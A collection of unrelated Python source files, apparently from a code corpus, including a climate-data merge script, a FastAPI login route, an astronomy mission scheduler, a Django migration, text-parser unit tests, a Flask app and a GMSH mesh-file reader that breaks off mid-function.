fileroot = settings.DATA_LOCATION + settings.OUTROOT + "_5x5_monthly_from_daily_{}{:02d}".format(time[0], time[1])
else:
fileroot = settings.DATA_LOCATION + settings.OUTROOT + "_5x5_monthly_{}{:02d}".format(time[0], time[1])
return fileroot # get_fileroot
#************************************************************************
# KATE modified
def set_up_merge(suffix = "relax", clims = False, months = False, pentads = False, start_year = defaults.START_YEAR, end_year = defaults.END_YEAR, start_month = 1, end_month = 12,
doQC = False, doQC1it = False, doQC2it = False, doQC3it = False, doBC = False, doBCtotal = False, doBChgt = False, doBCscn = False, doNOWHOLE = False,
doUSLR = False, doUSCN = False, doUHGT = False, doUR = False, doUM = False, doUC = False, doUTOT = False, ShipOnly = False):
#def set_up_merge(suffix = "relax", clims = False, months = False, pentads = False, start_year = defaults.START_YEAR, end_year = defaults.END_YEAR, start_month = 1, end_month = 12, doQC = False, doBC = False):
# end
'''
Obtain file roots and set processes running
:param str suffix: "relax" or "strict" criteria
:param bool clims: run the climatologies
:param bool months: run the climatologies
:param bool pentads: run the annual pentads
:param int start_year: start year to process
:param int end_year: end year to process
:param int start_month: start month to process
:param int end_month: end month to process
:param bool doQC: incorporate the QC flags or not
# KATE modified
:param bool doQC1it: incorporate the QC flags or not
:param bool doQC2it: incorporate the QC flags or not
:param bool doQC3it: incorporate the QC flags or not
# end
# KATE modified
:param bool doBCtotal: work on the total bias corrected data
:param bool doBChgt: work on the height only bias corrected data
:param bool doBCscn: work on the screen only bias corrected data
# end
:param bool doNOWHOLE: work on the BCtotal data with no whole number flagged data
:param bool doBC: work on the bias corrected data
# UNC NEW
:param bool doUSLR: work on solar adjustment uncertainty
:param bool doUSCN: work on instrument adjustment uncertainty
:param bool doUHGT: work on height adjustment uncertainty
:param bool doUR: work on rounding uncertainty
:param bool doUM: work on measurement uncertainty
:param bool doUM: work on climatology uncertainty
:param bool doUTOT: work on solar adjustment uncertainty
# KATE modified
:param bool ShipOnly: work on the ship only data
# end
# KATE modified
NOTE THAT I HAVE OVERWRITTEN settings.doMedian to force MEAN instead
# end
'''
# KATE modified
settings = set_paths_and_vars.set(doBC = doBC, doBCtotal = doBCtotal, doBChgt = doBChgt, doBCscn = doBCscn, doNOWHOLE = doNOWHOLE, doQC = doQC, doQC1it = doQC1it, doQC2it = doQC2it, doQC3it = doQC3it, \
doUSLR = doUSLR, doUSCN = doUSCN, doUHGT = doUHGT, doUR = doUR, doUM = doUM, doUC = doUC, doUTOT = doUTOT, ShipOnly = ShipOnly)
#settings = set_paths_and_vars.set(doBC = doBC, doQC = doQC)
# end
if clims:
print "Processing Climatologies"
TimeFreq = 'C' # this is used when writing out netCDF file so needs to be passed to do_merge
# fileroot = get_fileroot(settings, climatology = True)
# do_merge(fileroot, settings.mdi, suffix, doMedian = settings.doMedian)
fileroot = get_fileroot(settings, climatology = True, do3hr = True)
# KATE MEDIAN WATCH
# KATE modified - forcing MEAN
do_merge(fileroot, settings.mdi, suffix, clims = True, doMedian = False, TimeFreq = TimeFreq)
#do_merge(fileroot, settings.mdi, suffix, clims = True, doMedian = settings.doMedian)
# end
# and stdev
print "Processing Standard Deviations"
fileroot = get_fileroot(settings, climatology = True, do3hr = True, stdev = True)
# KATE MEDIAN WATCH
# KATE modified - forcing MEAN
do_merge(fileroot, settings.mdi, suffix, clims = True, doMedian = False, TimeFreq = TimeFreq)
#do_merge(fileroot, settings.mdi, suffix, clims = True, doMedian = settings.doMedian)
# end
if pentads:
print "Processing Pentads"
TimeFreq = 'P' # this is used when writing out netCDF file so needs to be passed to do_merge
# fileroot = get_fileroot(settings, pentads = True)
# do_merge(fileroot, settings.mdi, suffix, doMedian = settings.doMedian)
for year in np.arange(start_year, end_year + 1):
print year
fileroot = get_fileroot(settings, pentads = True, do3hr = True, time = [year])
# KATE MEDIAN WATCH
# KATE modified - forcing MEAN
do_merge(fileroot, settings.mdi, suffix, doMedian = False, TimeFreq = TimeFreq)
#do_merge(fileroot, settings.mdi, suffix, doMedian = settings.doMedian)
# end
if months:
print "Processing Monthly Files"
TimeFreq = 'M' # this is used when writing out netCDF file so needs to be passed to do_merge
# KATE modified - START_YEAR not defined - commented these out as they are all set in the call to function
#start_year = START_YEAR
#end_year = END_YEAR
#start_month = 1
#end_month = 12
# end
for year in np.arange(start_year, end_year + 1):
print year
for month in np.arange(start_month, end_month + 1):
print " {}".format(month)
# fileroot = get_fileroot(settings, months = True, time = [year, month])
# do_merge(fileroot, settings.mdi, suffix, doMedian = settings.doMedian)
fileroot = get_fileroot(settings, months = True, time = [year, month], daily = True, \
# UNC NEW
doUSLR = doUSLR, doUSCN = doUSCN, doUHGT = doUHGT, doUR = doUR, doUM = doUM, doUC = doUC, doUTOT = doUTOT)
# KATE MEDIAN WATCH
# KATE modified - forcing MEAN
do_merge(fileroot, settings.mdi, suffix, doMedian = False, TimeFreq = TimeFreq, \
# UNC NEW
doUSLR = doUSLR, doUSCN = doUSCN, doUHGT = doUHGT, doUR = doUR, doUM = doUM, doUC = doUC, doUTOT = doUTOT)
#do_merge(fileroot, settings.mdi, suffix, doMedian = settings.doMedian)
# end
return # set_up_merge
#************************************************************************
if __name__=="__main__":
import argparse
# set up keyword arguments
parser = argparse.ArgumentParser()
parser.add_argument('--suffix', dest='suffix', action='store', default = "relax",
help='"relax" or "strict" completeness, default = relax')
parser.add_argument('--clims', dest='clims', action='store_true', default = False,
help='run climatology merge, default = False')
parser.add_argument('--months', dest='months', action='store_true', default = False,
help='run monthly merge, default = False')
parser.add_argument('--pentads', dest='pentads', action='store_true', default = False,
help='run pentad merge, default = False')
parser.add_argument('--start_year', dest='start_year', action='store', default = defaults.START_YEAR,
help='which year to start run, default = 1973')
parser.add_argument('--end_year', dest='end_year', action='store', default = defaults.END_YEAR,
help='which year to end run, default = present')
parser.add_argument('--start_month', dest='start_month', action='store', default = 1,
help='which month to start run, default = 1')
parser.add_argument('--end_month', dest='end_month', action='store', default = 12,
help='which month to end run, default = 12')
parser.add_argument('--doQC', dest='doQC', action='store_true', default = False,
help='process the QC information, default = False')
# KATE modified
parser.add_argument('--doQC1it', dest='doQC1it', action='store_true', default = False,
help='process the first iteration QC information, default = False')
parser.add_argument('--doQC2it', dest='doQC2it', action='store_true', default = False,
help='process the second iteration QC information, default = False')
parser.add_argument('--doQC3it', dest='doQC3it', action='store_true', default = False,
help='process the third iteration QC information, default = False')
# end
parser.add_argument('--doBC', dest='doBC', action='store_true', default = False,
help='process the bias corrected data, default = False')
# KATE modified
parser.add_argument('--doBCtotal', dest='doBCtotal', action='store_true', default = False,
help='process the bias corrected data, default = False')
parser.add_argument('--doBChgt', dest='doBChgt', action='store_true', default = False,
help='process the height only bias corrected data, default = False')
parser.add_argument('--doBCscn', dest='doBCscn', action='store_true', default = False,
help='process the height only bias corrected data, default = False')
# end
parser.add_argument('--doNOWHOLE', dest='doNOWHOLE', action='store_true', default = False,
help='process the bias corrected data with all whole number flagged data removed, default = False')
# UNC NEW - THESE MUST BE RUN WITH --doBCtotal and --ShipOnly
parser.add_argument('--doUSCN', dest='doUSCN', action='store_true', default = False,
help='process the bias corrected data uncertainties for instrument adjustment, default = False')
parser.add_argument('--doUHGT', dest='doUHGT', action='store_true', default = False,
help='process the bias corrected data uncertainties for height adjustment, default = False')
parser.add_argument('--doUR', dest='doUR', action='store_true', default = False,
help='process the bias corrected data uncertainties for rounding, default = False')
parser.add_argument('--doUM', dest='doUM', action='store_true', default = False,
help='process the bias corrected data uncertainties for measurement, default = False')
parser.add_argument('--doUC', dest='doUC', action='store_true', default = False,
help='process the bias corrected data uncertainties for climatology, default = False')
parser.add_argument('--doUTOT', dest='doUTOT', action='store_true', default = False,
help='process the bias corrected data uncertainties combined, default = False')
parser.add_argument('--doUSLR', dest='doUSLR', action='store_true', default = False,
help='process the bias corrected data uncertainties for solar radiation, default = False')
# KATE modified
parser.add_argument('--ShipOnly', dest='ShipOnly', action='store_true', default = False,
help='process the ship platform type only data, default = False')
# end
args = parser.parse_args()
# KATE modified
# UNC NEW
set_up_merge(suffix = str(args.suffix), clims = args.clims, months = args.months, pentads = args.pentads, \
start_year = int(args.start_year), end_year = int(args.end_year), \
start_month = int(args.start_month), end_month = int(args.end_month), \
doQC = args.doQC, doQC1it = args.doQC1it, doQC2it = args.doQC2it, doQC3it = args.doQC3it, \
doBC = args.doBC, doBCtotal = args.doBCtotal, doBChgt = args.doBChgt, doBCscn = args.doBCscn, doNOWHOLE = args.doNOWHOLE, \
doUSLR = args.doUSLR, doUSCN = args.doUSCN, doUHGT = args.doUHGT, doUR = args.doUR, doUM = args.doUM, doUC = args.doUC, doUTOT = args.doUTOT, \
ShipOnly = args.ShipOnly)
#set_up_merge(suffix = str(args.suffix), clims = args.clims, months = args.months, pentads = args.pentads, \
# start_year = int(args.start_year), end_year = int(args.end_year), \
# start_month = int(args.start_month), end_month = int(args.end_month), doQC = args.doQC, doBC = args.doBC)
# end
# END
# ************************************************************************
|
StarcoderdataPython
|
186447
|
<filename>sponsor-challenges/csit/part1 source/opcode.py<gh_stars>1-10
class opcode(object):
nul = 1
hello = 2
rhello = 130
get = 160
rget = 161
|
StarcoderdataPython
|
4980105
|
from dependency_injector.wiring import inject, Provide
from fastapi import APIRouter, Depends
from application.rest_api.authentication.schemas import AuthenticateJwtResponse, LoginPostRequestBody
from application.users.container import UserContainer
from application.users.services import LoginUserService
router = APIRouter()
@router.post("/login", response_model=AuthenticateJwtResponse)
@inject
async def login(
login_post_request_body: LoginPostRequestBody,
login_user_service: LoginUserService = Depends(Provide[UserContainer.login_user_service]),
):
"""
Controller for authenticating the users.
:param login_post_request_body: The post request body required.
:param login_user_service: The login server which will authenticate the user.
:return: The encoded JWT response.
"""
return await login_user_service.apply(
email=login_post_request_body.email, password=<PASSWORD>_<PASSWORD>_request_body.password
)
|
StarcoderdataPython
|
6431805
|
<reponame>semaphoreP/EXOSIMS
from EXOSIMS.SurveySimulation.linearJScheduler import linearJScheduler
import astropy.units as u
import numpy as np
class occulterJScheduler(linearJScheduler):
"""occulterJScheduler
This class inherits linearJScheduler and works best when paired with the
SotoStarshade Observatory class.
Args:
nSteps (integer 1x1):
Number of steps to take when calculating the cost function.
\*\*specs:
user specified values
"""
def __init__(self, nSteps=1, useAngles=False, **specs):
linearJScheduler.__init__(self, **specs)
if nSteps < 1:
raise TypeError("nSteps must be 1 or greater")
nSteps = int(nSteps)
self.nSteps = nSteps
self.useAngles = useAngles
def choose_next_target(self, old_sInd, sInds, slewTimes, intTimes):
"""Helper method for method next_target to simplify alternative implementations.
Given a subset of targets (pre-filtered by method next_target or some
other means), select the best next one. The prototype uses completeness
as the sole heuristic.
Args:
old_sInd (integer):
Index of the previous target star
sInds (integer array):
Indices of available targets
slewTimes (astropy quantity array):
slew times to all stars (must be indexed by sInds)
intTimes (astropy Quantity array):
Integration times for detection in units of day
Returns:
sInd (integer):
Index of next target star
waitTime (astropy Quantity):
some strategic amount of time to wait in case an occulter slew is desired (default is None)
"""
OS = self.OpticalSystem
Comp = self.Completeness
TL = self.TargetList
Obs = self.Observatory
TK = self.TimeKeeping
# cast sInds to array
sInds = np.array(sInds, ndmin=1, copy=False)
# calculate dt since previous observation
dt = TK.currentTimeAbs.copy() + slewTimes[sInds]
# get dynamic completeness values
comps = Comp.completeness_update(TL, sInds, self.starVisits[sInds], dt)
# if first target, or if only 1 available target,
# choose highest available completeness
nStars = len(sInds)
if (old_sInd is None) or (nStars == 1):
sInd = np.random.choice(sInds[comps == max(comps)])
return sInd, slewTimes[sInd]
else:
# define adjacency matrix
A = np.zeros(nStars)
# only consider slew distance when there's an occulter
if OS.haveOcculter:
angdists = Obs.star_angularSep(TL, old_sInd, sInds, dt)
try:
Obs.__getattribute__('dV_interp')
except:
self.useAngles = True
if self.useAngles:
A[np.ones((nStars), dtype=bool)] = angdists
A = self.coeffs[0]*(A)/np.pi
else:
dVs = np.array([Obs.dV_interp(slewTimes[sInds[s]],angdists[s].to('deg'))[0] for s in range(len(sInds))])
A[np.ones((nStars), dtype=bool)] = dVs
A = self.coeffs[0]*(A)/(0.025*Obs.dVtot.value)
# add factor due to completeness
A = A + self.coeffs[1]*(1 - comps)
# add factor due to unvisited ramp
f_uv = np.zeros(nStars)
unvisited = self.starVisits[sInds]==0
f_uv[unvisited] = float(TK.currentTimeNorm.copy()/TK.missionLife)**2
A = A - self.coeffs[2]*f_uv
# add factor due to revisited ramp
f2_uv = np.where(self.starVisits[sInds] > 0, 1, 0) *\
(1 - (np.in1d(sInds, self.starRevisit[:,0],invert=True)))
A = A + self.coeffs[3]*f2_uv
if self.nSteps > 1:
A_ = np.zeros((nStars,nStars))
# only consider slew distance when there's an occulter
if OS.haveOcculter:
angdists_ = np.array([Obs.star_angularSep(TL, s, sInds, dt) for s in range(len(sInds))])*u.d
dVs_= np.array([Obs.dV_interp(slewTimes[sInds[s]],angdists_[s,:]) for s in range(len(sInds))])
A_ = self.coeffs[0]*dVs_.reshape(nStars,nStars)/(0.025*Obs.dVtot.value)
# add factor due to completeness
A_ = A_ + self.coeffs[1]*(1 - comps)
# add factor due to unvisited ramp
f_uv = np.zeros(nStars)
unvisited = self.starVisits[sInds]==0
f_uv[unvisited] = float(TK.currentTimeNorm.copy()/TK.missionLife)**2
A_ = A_ - self.coeffs[2]*f_uv
# add factor due to revisited ramp
f2_uv = np.where(self.starVisits[sInds] > 0, 1, 0) *\
(1 - (np.in1d(sInds, self.starRevisit[:,0],invert=True)))
A_ = A_ + self.coeffs[3]*f2_uv
step1 = np.tile(A, (nStars, 1)).flatten('F')
stepN = A_.flatten()
tmp = np.argmin( step1 + stepN*(self.nSteps-1) )
sInd = sInds[int(np.floor(tmp/float(nStars)))]
else:
# take just one step
tmp = np.argmin(A)
sInd = sInds[int(tmp)]
return sInd, slewTimes[sInd] #if coronagraph or first sInd, waitTime will be 0 days
|
StarcoderdataPython
|
4928918
|
<reponame>ChuanleiGuo/AlgorithmsPlayground
class Solution(object):
def PredictTheWinner(self, nums):
"""
:type nums: List[int]
:rtype: bool
"""
mem = {}
def helper(i, j):
if (i, j) not in mem:
mem[(i, j)] = nums[i] if i == j else \
max(nums[i] - helper(i + 1, j), nums[j] - helper(i, j - 1))
return mem[(i, j)]
return helper(0, len(nums) - 1) >= 0
|
StarcoderdataPython
|
12815373
|
<gh_stars>1-10
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Nameserver'
db.create_table('nameserver', (
('created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('ttl', self.gf('django.db.models.fields.PositiveIntegerField')(default=3600, null=True, blank=True)),
('description', self.gf('django.db.models.fields.CharField')(max_length=1000, null=True, blank=True)),
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('domain', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['domain.Domain'])),
('server', self.gf('django.db.models.fields.CharField')(max_length=255)),
('addr_glue', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='nameserver_set', null=True, to=orm['address_record.AddressRecord'])),
('intr_glue', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='nameserver_set', null=True, to=orm['static_intr.StaticInterface'])),
))
db.send_create_signal('nameserver', ['Nameserver'])
# Adding unique constraint on 'Nameserver', fields ['domain', 'server']
db.create_unique('nameserver', ['domain_id', 'server'])
# Adding M2M table for field views on 'Nameserver'
db.create_table('nameserver_views', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('nameserver', models.ForeignKey(orm['nameserver.nameserver'], null=False)),
('view', models.ForeignKey(orm['view.view'], null=False))
))
db.create_unique('nameserver_views', ['nameserver_id', 'view_id'])
def backwards(self, orm):
# Removing unique constraint on 'Nameserver', fields ['domain', 'server']
db.delete_unique('nameserver', ['domain_id', 'server'])
# Deleting model 'Nameserver'
db.delete_table('nameserver')
# Removing M2M table for field views on 'Nameserver'
db.delete_table('nameserver_views')
models = {
'address_record.addressrecord': {
'Meta': {'unique_together': "(('label', 'domain', 'fqdn', 'ip_upper', 'ip_lower', 'ip_type'),)", 'object_name': 'AddressRecord', 'db_table': "'address_record'"},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'domain': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['domain.Domain']"}),
'fqdn': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip_lower': ('django.db.models.fields.BigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'ip_str': ('django.db.models.fields.CharField', [], {'max_length': '39'}),
'ip_type': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'ip_upper': ('django.db.models.fields.BigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '63', 'null': 'True', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'ttl': ('django.db.models.fields.PositiveIntegerField', [], {'default': '3600', 'null': 'True', 'blank': 'True'}),
'views': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['view.View']", 'symmetrical': 'False', 'blank': 'True'})
},
'domain.domain': {
'Meta': {'object_name': 'Domain', 'db_table': "'domain'"},
'delegated': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'dirty': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_reverse': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'master_domain': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['domain.Domain']", 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'purgeable': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'soa': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['soa.SOA']", 'null': 'True', 'blank': 'True'})
},
'nameserver.nameserver': {
'Meta': {'unique_together': "(('domain', 'server'),)", 'object_name': 'Nameserver', 'db_table': "'nameserver'"},
'addr_glue': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'nameserver_set'", 'null': 'True', 'to': "orm['address_record.AddressRecord']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'domain': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['domain.Domain']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'intr_glue': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'nameserver_set'", 'null': 'True', 'to': "orm['static_intr.StaticInterface']"}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'server': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'ttl': ('django.db.models.fields.PositiveIntegerField', [], {'default': '3600', 'null': 'True', 'blank': 'True'}),
'views': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['view.View']", 'symmetrical': 'False', 'blank': 'True'})
},
'network.network': {
'Meta': {'unique_together': "(('ip_upper', 'ip_lower', 'prefixlen'),)", 'object_name': 'Network', 'db_table': "'network'"},
'dhcpd_raw_include': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip_lower': ('django.db.models.fields.BigIntegerField', [], {'blank': 'True'}),
'ip_type': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'ip_upper': ('django.db.models.fields.BigIntegerField', [], {'blank': 'True'}),
'network_str': ('django.db.models.fields.CharField', [], {'max_length': '49'}),
'prefixlen': ('django.db.models.fields.PositiveIntegerField', [], {}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['site.Site']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'vlan': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['vlan.Vlan']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'})
},
'site.site': {
'Meta': {'unique_together': "(('name', 'parent'),)", 'object_name': 'Site', 'db_table': "'site'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['site.Site']", 'null': 'True', 'blank': 'True'})
},
'soa.soa': {
'Meta': {'unique_together': "(('primary', 'contact', 'description'),)", 'object_name': 'SOA', 'db_table': "'soa'"},
'contact': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'dirty': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'expire': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1209600'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_signed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'minimum': ('django.db.models.fields.PositiveIntegerField', [], {'default': '180'}),
'primary': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'refresh': ('django.db.models.fields.PositiveIntegerField', [], {'default': '180'}),
'retry': ('django.db.models.fields.PositiveIntegerField', [], {'default': '86400'}),
'serial': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1368820989'}),
'ttl': ('django.db.models.fields.PositiveIntegerField', [], {'default': '3600', 'null': 'True', 'blank': 'True'})
},
'static_intr.staticinterface': {
'Meta': {'unique_together': "(('ip_upper', 'ip_lower', 'label', 'domain', 'mac'),)", 'object_name': 'StaticInterface', 'db_table': "'static_interface'"},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'dhcp_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'dns_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'domain': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['domain.Domain']"}),
'fqdn': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip_lower': ('django.db.models.fields.BigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'ip_str': ('django.db.models.fields.CharField', [], {'max_length': '39'}),
'ip_type': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'ip_upper': ('django.db.models.fields.BigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '63', 'null': 'True', 'blank': 'True'}),
'mac': ('django.db.models.fields.CharField', [], {'max_length': '17'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'reverse_domain': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'reverse_staticintr_set'", 'null': 'True', 'to': "orm['domain.Domain']"}),
'system': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['system.System']", 'null': 'True', 'blank': 'True'}),
'ttl': ('django.db.models.fields.PositiveIntegerField', [], {'default': '3600', 'null': 'True', 'blank': 'True'}),
'views': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['view.View']", 'symmetrical': 'False', 'blank': 'True'}),
'vrf': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['vrf.Vrf']", 'null': 'True', 'blank': 'True'}),
'workgroup': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['workgroup.Workgroup']", 'null': 'True', 'blank': 'True'})
},
'system.system': {
'Meta': {'unique_together': "(('name', 'location', 'department'),)", 'object_name': 'System', 'db_table': "'system'"},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'department': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'view.view': {
'Meta': {'unique_together': "(('name',),)", 'object_name': 'View', 'db_table': "'view'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'vlan.vlan': {
'Meta': {'unique_together': "(('name', 'number'),)", 'object_name': 'Vlan', 'db_table': "'vlan'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'number': ('django.db.models.fields.PositiveIntegerField', [], {})
},
'vrf.vrf': {
'Meta': {'object_name': 'Vrf', 'db_table': "'vrf'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'network': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['network.Network']", 'null': 'True'})
},
'workgroup.workgroup': {
'Meta': {'object_name': 'Workgroup', 'db_table': "'workgroup'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'})
}
}
complete_apps = ['nameserver']
|
StarcoderdataPython
|
9703125
|
<filename>tests/test_create_features.py
# Lint as: python3
"""
test TextParsers
"""
import unittest
from src import text_parser
class TestCreateFeatures(unittest.TestCase):
def test_percent_uppercase(self):
text = "aA"
uppercase = text_parser.percent_uppercase(text)
self.assertEqual(0.5, uppercase)
text = "A"
uppercase = text_parser.percent_uppercase(text)
self.assertEqual(1, uppercase)
text = "a"
uppercase = text_parser.percent_uppercase(text)
self.assertEqual(0, uppercase)
def test_count_ref(self):
text = ">"
num_ref = text_parser.count_reference_line(text)
self.assertEqual(1, num_ref)
text = "x"
num_ref = text_parser.count_reference_line(text)
self.assertEqual(0, num_ref)
text = "x>"
num_ref = text_parser.count_reference_line(text)
self.assertEqual(0, num_ref)
text = "x\n>"
num_ref = text_parser.count_reference_line(text)
self.assertEqual(1, num_ref)
def test_remove_ref(self):
text = ">"
text = text_parser.remove_reference(text)
self.assertEqual("", text)
text = "hello\n>x"
text = text_parser.remove_reference(text)
self.assertEqual("hello\n", text)
text = "hello\n>x\nhello"
text = text_parser.remove_reference(text)
self.assertEqual("hello\n\nhello", text)
def test_plus_one(self):
text = "+1"
num_plus_one = text_parser.count_plus_one(text)
self.assertEqual(1, num_plus_one)
text = ""
num_plus_one = text_parser.count_plus_one(text)
self.assertEqual(0, num_plus_one)
text = "+1"
clean = text_parser.sub_PlusOne(text)
print(clean)
self.assertEqual("plus one", clean)
text = "hello+1world"
clean = text_parser.sub_PlusOne(text)
self.assertEqual("helloplus oneworld", clean)
|
StarcoderdataPython
|
9638998
|
<gh_stars>0
# Demo Python Dictionaries - Dictionary
'''
Nested Dictionaries
A dictionary can also contain many dictionaries, this is called nested dictionaries.
'''
# Create a dictionary that contain three dictionaries:
myfamily = {
"child1" : {
"name" : "Emil",
"year" : 2004
},
"child2" : {
"name" : "Tobias",
"year" : 2007
},
"child3" : {
"name" : "Linus",
"year" : 2011
}
}
print(myfamily)
|
StarcoderdataPython
|
3288768
|
<filename>lorem.py
from flask import Flask, render_template
app = Flask(__name__)
@app.route("/")
def index2():
return render_template("index2.html")
@app.route("/more")
def more():
return render_template("more.html")
|
StarcoderdataPython
|
5004232
|
# -*- coding: utf-8 -*-
# pylint: disable=E1101,C0103
r"""@package gmsh
Contains utilities for reading data from a GMSH-generated mesh file
@author <NAME> (<EMAIL>)
"""
import numpy
import struct
class GmshElement(object):
"""Enumeration of GMSH element types"""
TRIANGLE = 2
QUAD = 3
class GmshFileReader(object):
"""Reads and processes a GMSH-generated file"""
__DIM = 3
__MAX_VERT = 4
__VERSION = '2.2'
__FILE_TYPE = '1'
__DATA_SIZE = '8'
def __init__(self, name):
"""Constructs a new reader object from the GMSH file name
@param name [@c string]: Name of the GMSH file
"""
self.name = name
def read_ascii(self):
"""Reads a GMSH .msh file in ASCII format
@retval elts [@c numpy.ndarray]: Element connectivity matrix
@retval verts [@c numpy.ndarray]: Vertex list
"""
with open(self.name, 'r') as f:
for line in f:
if '$Nodes' in line:
num_verts = int(f.next())
verts = numpy.empty((num_verts, GmshFileReader.__DIM))
for i in xrange(num_verts):
verts[i, :] = f.next().split()[1:]
elif '$Elements' in line:
num_elts = int(f.next())
elts = numpy.zeros((num_elts, GmshFileReader.__MAX_VERT),
dtype=numpy.int)
for i in xrange(num_elts):
words = f.next().split()
elt_type, num_tags = int(words[1]), int(words[2])
start_col = 3 + num_tags
if elt_type == GmshElement.TRIANGLE:
elts[i, :-1] = words[start_col:]
elif elt_type == GmshElement.QUAD:
elts[i, :] = words[start_col:]
if all(elts[:, -1] == 0):
elts = elts[:, :-1]
elts = elts[~numpy.all(elts == 0, axis=1)]
elts -= 1
break
return elts, verts
def read_binary(self):
"""Reads a GMSH .msh file in binary format
@retval elts [@c numpy.ndarray]: Element connectivity matrix
